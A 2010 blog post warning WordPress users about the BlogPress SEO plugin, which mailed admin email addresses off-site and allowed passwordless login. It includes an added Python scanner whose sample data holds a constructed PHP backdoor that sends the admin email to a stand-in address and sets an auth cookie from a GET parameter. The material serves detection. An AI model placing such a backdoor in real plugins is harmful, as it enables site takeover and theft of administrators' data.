November 14, 2010

Is That WordPress Plugin Update Really MALWARE Instead? How to check.


Today is a wondrous Sunday! The day I was supposed to (get this, I hope you're sitting down) "rest" (OMG!) and "take a break" (Jeepers, say it ain't so!)

And I was, honestly and truly.

I really was!


Until I read this chilling post, and realized – I simply *have* to alert my readers.

BlogPress SEO: solved

Now, Yoast is beyond brilliant when it comes to WordPress; his blog is something you simply must follow (you can subscribe by email here or grab his RSS feed here).

Anywhos, there I was, blissfully consuming my 34th cup of coffee, wrapped up in my nice fluffy blue 21-year-old house coat (funny how you just cannot get rid of down-home comforts, eh?) and simply enjoying my 4am.

I'll bet you're familiar with my state of being, right? 

After all, imagine that you had just awakened, your family was still happily asleep so you could (sit down again, another impossible scenario is steamrolling to you this instant) get some work done, and you fire up your feedreader.

Figuring that you'd start checking out what your peers were writing, you calmly scroll through your entries and then you read…..THIS.

…I thought BlogPress SEO was bad, turns out, it's worse. It's malware. I had already discovered that it sent the admin email to the plugin's author, but today, mtekk uncovered that it was adding an option to log in, solely with that email address. Yes that's bad. I checked out the plugin code again, and noticed something that could solve all this….MORE….

Now, I don't know about you, but put the words:

  • malware
  • admin email
  • wordpress plugin

all together, and you've concocted a sure-fire recipe for me to leap up in a state of extreme agitation (without spilling a drop of coffee, mind you, I'm not that hopeless) and shriek to the monitor:

"Jeepers self, shall I covertly panic now or in 2 seconds?"

Luckily sanity did prevail (raising a passel of kids and mooses and Twitter Budgies does that for me) and I continued reading.

Here's what happened.

1.)  A WordPress plugin was created on a site that promised:

We have developed a superb wordpress plugin which can actually get 100's of backlinks like crazy, all on autopilot.  As soon as you install the plugin, the plugin will find all relevant blogs in the network which are similar to your niche. So if you write about dogs then the plugin will find all blogs which talk about dogs. Once the plugin finds the relevant blogs, it will mutually exchange links between the blogs. So if you have 300 posts in your blog then it will find 300 similar posts in the network, and in turn mutually link with those posts. So you will get around 300 backlinks right away. The more you write the more backlinks will be found by the plugin for your posts. This is an ongoing process and I can assure you that you will see gradual increase in traffic over time. ….MORE…..

2.)  The download was from the original site, NOT the WordPress plugin repository.

In other words, that meant none of the repository's security checks could be applied to it.

Can you say, "Danger, Will Robinson?"

3.)  The BlogPress SEO plugin was written to steal your admin login info AND make it possible to log in to your WordPress blog without a password.

To quote Yoast:

Update: It gets worse. As pointed out by this post, BlogPress SEO is pure malware, as it contains a function that allows someone who knows your admin email address (you know, the one they just sent to themselves when you installed the plugin) to log in without a password… That's purely criminal.

That post was written by mtekkmonkey; his blog can be found over at M'tekk's Crib and the feed is here (definitely add!).
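The two behaviours described above (mailing the admin email address off-site, and logging someone in on the strength of a request parameter that matches that address) both leave fingerprints in plugin source that a site owner can look for before trusting a download. The following is an added example, written for this post and not code from Yoast, mtekk or the plugin in question: it parses the standard plugin header, runs two heuristic pattern checks over each file, and reports what it finds. The plugin sources inside it are constructed stand-ins for the demo, not the real BlogPress SEO code, and the pattern rules are assumptions about what such behaviour tends to look like, so a hit is a reason to read the file, not proof on its own.

```python
"""Heuristic audit of WordPress plugin source for two red flags:
the admin e-mail address being mailed somewhere, and a login being
established from raw request data. Example code, not from the post."""
import os
import re
import sys
from typing import Dict, List

# Constructed sample sources for the demo (NOT the real plugin's code).
SAMPLE_PLUGINS: Dict[str, str] = {
    "blogpressseo/blogpressseo.php": """<?php
/*
Plugin Name: BlogPress SEO
Version: 1.0
*/
add_action('init', 'bps_init');
function bps_init() {
    $email = get_option('admin_email');
    wp_mail('collector@example.invalid', 'new install', $email);
    if (isset($_GET['e']) && $_GET['e'] == $email) {
        $user = get_user_by('email', $email);
        wp_set_auth_cookie($user->ID);
    }
}
""",
    "tidy-titles/tidy-titles.php": """<?php
/*
Plugin Name: Tidy Titles
Version: 0.3
*/
add_filter('the_title', 'tt_tidy');
function tt_tidy($title) {
    return trim($title);
}
""",
}

# Standard header fields every WordPress plugin carries in its top comment.
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version)\s*:\s*(.+?)\s*$", re.M)
# Raw request superglobals: untrusted input under the visitor's control.
REQUEST_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
MAIL_RE = re.compile(r"\bwp_mail\s*\(")
ADMIN_EMAIL_RE = re.compile(r"admin_email")
# Calls that establish a logged-in session without going through wp_signon().
LOGIN_RE = re.compile(r"\b(wp_set_auth_cookie|wp_set_current_user)\s*\(")


def parse_header(src: str) -> Dict[str, str]:
    """Pull 'Plugin Name' and 'Version' out of the header comment."""
    return {key: value for key, value in HEADER_RE.findall(src)}


def find_risky_patterns(src: str) -> List[str]:
    """Return human-readable findings; each is a heuristic, not proof."""
    findings: List[str] = []
    # Heuristic 1: outbound mail in a file that also touches the admin_email option.
    if MAIL_RE.search(src) and ADMIN_EMAIL_RE.search(src):
        findings.append("exfiltrates admin_email via wp_mail")
    # Heuristic 2: a session-establishing call in a file that reads raw request data.
    if LOGIN_RE.search(src) and REQUEST_RE.search(src):
        findings.append("sets auth cookie from request data")
    return findings


def audit_plugins(plugins: Dict[str, str]) -> Dict[str, dict]:
    """Map each plugin file path to its header fields and findings."""
    report: Dict[str, dict] = {}
    for path, src in plugins.items():
        header = parse_header(src)
        report[path] = {
            "name": header.get("Plugin Name", "?"),
            "version": header.get("Version", "?"),
            "findings": find_risky_patterns(src),
        }
    return report


def load_plugins_dir(root: str) -> Dict[str, str]:
    """Read every .php file under a real wp-content/plugins directory."""
    sources: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    sources[os.path.relpath(full, root)] = fh.read()
    return sources


if __name__ == "__main__":
    # Pass a plugins directory to scan it; with no argument the demo samples run.
    plugins = load_plugins_dir(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PLUGINS
    for path, info in audit_plugins(plugins).items():
        status = "SUSPICIOUS" if info["findings"] else "ok"
        print(f"{status:10} {info['name']} {info['version']} ({path})")
        for finding in info["findings"]:
            print(f"           - {finding}")
```

Run it with no arguments to see the constructed samples scored, or point it at a site's wp-content/plugins directory. The file-level rules deliberately err toward noise: a legitimate plugin may mail the admin for notifications, so the value is in the combination of flags and in prompting a read of the flagged file, which is exactly the kind of check that the repository's review would otherwise have done for you.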

So I'll bet you're wondering just what mistake the plugin author made?

You'll love this:

4.)  The BlogPress SEO WordPress plugin author wrote to BOTH Yoast AND mtekkmonkey and asked for a review.

Wow wow wow wow.

But here's a quick fix Yoast inflicted on that malware BlogPress WordPress Plugin!

This is sheer brilliance.

…With permission, he made a blank plugin by the same name over at the WordPress Repository that simply had a higher version number.

To wit:

With the help of Andrew Nacin, I registered blogpressseo as a plugin on, created an empty plugin file with the same name and a higher version number, added a readme.txt with an upgrade notice, and uploaded it to….

I had already installed the plugin on my blog (well, an empty version of it, just the headers), so I could test it, and lo and behold, it worked…

It's a primitive form of a kill switch (which I wish WordPress had, but it's better than nothing). The funny thing is: we'll now also be able to see how many people are running this plugin and how many of them upgrade. So far, 26 people have been saved!…MORE….

Wasn't that smart of him?

Which brings me now to:

What *you*, gentle reader, need to do *now*

If you've installed the BlogPress SEO plugin, *uninstall* it now.

Change your admin password.

And tell all of your network about this problem (feel free to point them to this site if needed).

In closing

When finding a nifty-neato WordPress plugin, you need to search for it FIRST on Google to see if anyone has experienced any problems already.


An educated blogger is always the best kind of blogger!

And one last thing:

Ideally, always and only download WordPress plugins from the official WordPress Plugin Repository.

While it's still no absolute guarantee of safety, it's as near to that as you can get.

Want more information?  Check out:

Hope you found this article useful! It sure caught my attention, indeed.

Grow strong,

Barbara Ling
